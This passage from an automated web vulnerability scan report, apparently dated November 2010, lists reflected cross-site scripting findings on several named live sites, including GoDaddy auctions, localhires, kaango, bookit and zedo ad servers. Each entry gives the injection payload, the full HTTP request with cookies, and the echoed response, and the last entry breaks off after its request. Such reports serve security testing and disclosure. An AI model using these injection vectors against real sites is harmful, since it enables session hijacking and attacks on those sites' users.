3.20. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload f5f88%0aalert(1)//18c6c8e3c8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5f88
alert(1)//18c6c8e3c8d
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?f5f88%0aalert(1)//18c6c8e3c8d=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=c1yviejda3oh2snze4wofx55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=f5f88%0aalert(1)%2f%2f18c6c8e3c8d=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209402


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
e").value = getObj("loginname-loginname").value;
               getObj("auctionPassword").value = getObj("password-password").value;
               setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?f5f88
alert(1)//18c6c8e3c8d
=1");
               document.auctionLoginForm.submit();
           }

           function closePods(header)
           {
               shsClose(1); shsClose(2); shsClose(3); shsClose(4); shsClose(5);
               shsClose(6); shsClose(7); shsClose
...[SNIP]...

3.21. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9be2e"%3balert(1)//2e07d29c569 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9be2e";alert(1)//2e07d29c569 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?9be2e"%3balert(1)//2e07d29c569=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=es4x3t3m5fzfzauv4wge2t55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=9be2e%22%3balert(1)%2f%2f2e07d29c569=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 210223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<script type="text/javascript">
               function AddMembershipToCart() {
                   setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?9be2e";alert(1)//2e07d29c569=1");
                   if (getObj("ctl00_cphMaster_tbBidAmount"))
                   { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); }
                   else if (getObj("ctl00_cphMaster_tbOfferAmount"))
                   { setCoo
...[SNIP]...

3.22. http://bayarea.localhires.com/job_fairs/view/1039 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bayarea.localhires.com
Path:   /job_fairs/view/1039

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c45e"><script>alert(1)</script>093fc53e67a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job_fairs/view/1039?9c45e"><script>alert(1)</script>093fc53e67a=1 HTTP/1.1
Host: bayarea.localhires.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:59:26 GMT
Server: Apache
Served-By: Joyent
Set-Cookie: Localhires=895qnvadt9mj5agn5njgpf9hjq5al4ks; expires=Thu, 15-Nov-2035 07:59:26 GMT; path=/; domain=.localhires.com
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: last_fair_id=1039
Set-Cookie: Localhires=895qnvadt9mj5agn5njgpf9hjq5al4ks; expires=Thu, 15-Nov-2035 07:59:26 GMT; path=/; domain=.localhires.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta http-equiv="Conten
...[SNIP]...
<a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=152&amp;pub=xa-4ab7c54d65a99a54" onMouseOver="return addthis_open(this, '', 'http://bayarea.localhires.com/job_fairs/view/1039?9c45e"><script>alert(1)</script>093fc53e67a=1', 'San Jose Job Fair on November 16th, 2010 on Tuesday, November 16, 2010')" onMouseOut="addthis_close()" onClick="return addthis_sendto()" rel="nofollow">
...[SNIP]...

3.23. http://bayareamarketplace.kaango.com/ads/search [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bayareamarketplace.kaango.com
Path:   /ads/search

Issue detail

The value of the search request parameter is copied into the HTML document as plain text between tags. The payload 4d577<script>alert(1)</script>4e5c6690b88 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/search?search=4d577<script>alert(1)</script>4e5c6690b88&cat=561&fq=categoryid:903&listtype=1 HTTP/1.1
Host: bayareamarketplace.kaango.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=0bdbf11e73ab5ff78a1f8da6916f0855;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Mon, 15 Nov 2010 01:59:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: Close
Content-Length: 43965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<p>
Bay Area Marketplace:

0 search results for '4d577<script>alert(1)</script>4e5c6690b88'
within 100 miles from San Jose, California

in category Autos: Services & Parts
           &nbsp;</p>
...[SNIP]...

3.24. http://bayareamarketplace.kaango.com/feListAds [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bayareamarketplace.kaango.com
Path:   /feListAds

Issue detail

The value of the search request parameter is copied into the HTML document as plain text between tags. The payload 50f7d<script>alert(1)</script>abb9201ca97 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feListAds?search=50f7d<script>alert(1)</script>abb9201ca97&cat=561&listtype=1 HTTP/1.1
Host: bayareamarketplace.kaango.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=0bdbf11e73ab5ff78a1f8da6916f0855;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Mon, 15 Nov 2010 01:59:45 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: Close
Content-Length: 43491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<p>
Bay Area Marketplace:

0 search results for '50f7d<script>alert(1)</script>abb9201ca97'
within 100 miles from San Jose, California

in category Autos: Services & Parts
           &nbsp;</p>
...[SNIP]...

3.25. http://bookit.com/us/california/san-francisco/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bookit.com
Path:   /us/california/san-francisco/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25fdd</script><script>alert(1)</script>6017cefd337 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/california/san-francisco/?25fdd</script><script>alert(1)</script>6017cefd337=1 HTTP/1.1
Host: bookit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:09:01 GMT
Server: Apache
Set-Cookie: siteId=198; expires=Tue, 14-Dec-2010 23:09:01 GMT; path=/; domain=.bookit.com
Expires: Sun, 14 Nov 2010 23:19:01 GMT
Cache-Control: max-age=600, must-revalidate
Connection: close
Content-Type: text/html
Content-Length: 762675

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
   <html>
       <head>
       <title>San Francisco Hotels: Book Your San Francisco California Hotel Online BookIt.co
...[SNIP]...
<br>25fdd</script><script>alert(1)</script>6017cefd337=>
...[SNIP]...

3.26. http://c7.zedo.com/ibar/v12-002/c1/jsc/fcn1.js [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /ibar/v12-002/c1/jsc/fcn1.js

Issue detail

The value of the c request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload def38%3balert(1)//121dfcfc6b0 was submitted in the c parameter. This input was echoed as def38;alert(1)//121dfcfc6b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ibar/v12-002/c1/jsc/fcn1.js?01AD=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ&01RI=2C2A2265FA21E98&01NA=&n=162&c=570def38%3balert(1)//121dfcfc6b0&s=372&d=21&w=1&x=29&h=1&t=http://c7.zedo.com/OzoDB/headers/162/intercept_int268_common.js&r=24&z=0.9249365942940089 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/bay-area-living
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: FFgeo=8925100; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; ZEDOIDX=29; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; IZ93=CT-1
Proxy-Connection: Keep-Alive
Host: c7.zedo.com

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; expires=Mon, 13-Dec-2010 01:07:17 GMT; path=/; domain=c7.zedo.com
Set-Cookie: ZHO162,570def38;alert(1),21=1;expires=Tue, 16 Nov 2010 01:00:00 GMT;domain=.zedo.com;path=/;
ETag: "a1a6d5-f92-48e2846698880"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
X-Varnish: 408653166
Cache-Control: max-age=842
Date: Mon, 15 Nov 2010 01:07:17 GMT
Connection: close
Content-Length: 5041

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzStr="q=0;z="+Math.random();var zzSection=372;var zzPat='0';var zzIdx='29';

var zzNetwork=162;var zzChannel=570def38;alert(1)//121dfcfc6b0;var zzSection=372;var zzDim=21;


if(document.all){
if(document.documentElement&&document.documentElement.clientWidth&&document.documentElement.offsetWidth){
var yr2=document.documentElement.offsetHei
...[SNIP]...

3.27. http://c7.zedo.com/jsc/c5/fl.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /jsc/c5/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf915"-alert(1)-"09447ce8dc5 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/c5/fl.js?n=1239&c=98&s=27&d=14&w=728&h=90&l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/bf915"-alert(1)-"09447ce8dc5&z=115169\ HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1933
Content-Type: application/x-javascript
ETag: "703b68d0-4429-48e2858f30440"
X-Varnish: 408724450 408724126
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=113
Expires: Mon, 15 Nov 2010 02:53:10 GMT
Date: Mon, 15 Nov 2010 02:51:17 GMT
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';

var zzhasAd;


               var zzStr =
...[SNIP]...
IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/bf915"-alert(1)-"09447ce8dc5http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...

3.28. http://c7.zedo.com/jsc/c5/fl.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /jsc/c5/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31bdf"-alert(1)-"a648b904fc1 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/c5/fl.js?n=1239&c=98&s=27&d=14&w=728&h=90&l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/31bdf"-alert(1)-"a648b904fc1&z=115169 HTTP/1.1
Accept: */*
Referer: http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: c7.zedo.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: FFgeo=8925100; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; ZEDOIDX=29; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZHO162,570,21=1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "898b0b78-4239-48e2858f30440"
Vary: Accept-Encoding
X-Varnish: 1843423143 1843421748
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=109
Date: Mon, 15 Nov 2010 02:51:21 GMT
Connection: close
Content-Length: 1933

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';

var zzhasAd;


               var zzStr =
...[SNIP]...
IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/31bdf"-alert(1)-"a648b904fc1http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...

3.29. http://c7.zedo.com/jsc/c5/fl.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /jsc/c5/fl.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4eeda'-alert(1)-'52d71231c98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/c5/fl.js?4eeda'-alert(1)-'52d71231c98=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 771
Content-Type: application/x-javascript
ETag: "703b68d0-4429-48e2858f30440"
X-Varnish: 408724450 408724126
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1733
Expires: Mon, 15 Nov 2010 03:20:03 GMT
Date: Mon, 15 Nov 2010 02:51:10 GMT
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

w0.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=lar/v10-003/c7;referrer='+document.referrer+';tag=c7.zedo.com/jsc/c5/fl.js;qs=4eeda'-alert(1)-'52d71231c98=1;';

var zzStr="q=;z="+Math.random();var zzSection=0;var zzPat='';

var zzhasAd;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = new Date(); zzd.setDate(zz
...[SNIP]...

3.30. http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /lar/v10-003/c7/jsc/flr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d3e"-alert(1)-"04bae8b6b31 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lar/v10-003/c7/jsc/flr.js?n=1239&c=98&s=27&d=14&w=728&h=90&l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/39d3e"-alert(1)-"04bae8b6b31&z=115169 HTTP/1.1
Accept: */*
Referer: http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: c7.zedo.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: FFgeo=8925100; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; ZEDOIDX=29; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZHO162,570,21=1; ZCBC=1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "898b0b78-4239-48e2858f30440"
Vary: Accept-Encoding
X-Varnish: 1843423143 1843421748
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=109
Date: Mon, 15 Nov 2010 02:51:21 GMT
Connection: close
Content-Length: 1933

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';

var zzhasAd;


               var zzStr =
...[SNIP]...
IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/39d3e"-alert(1)-"04bae8b6b31http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...

3.31. http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /lar/v10-003/c7/jsc/flr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f763'-alert(1)-'1a7b6ec85c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lar/v10-003/c7/jsc/flr.js?1f763'-alert(1)-'1a7b6ec85c8=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
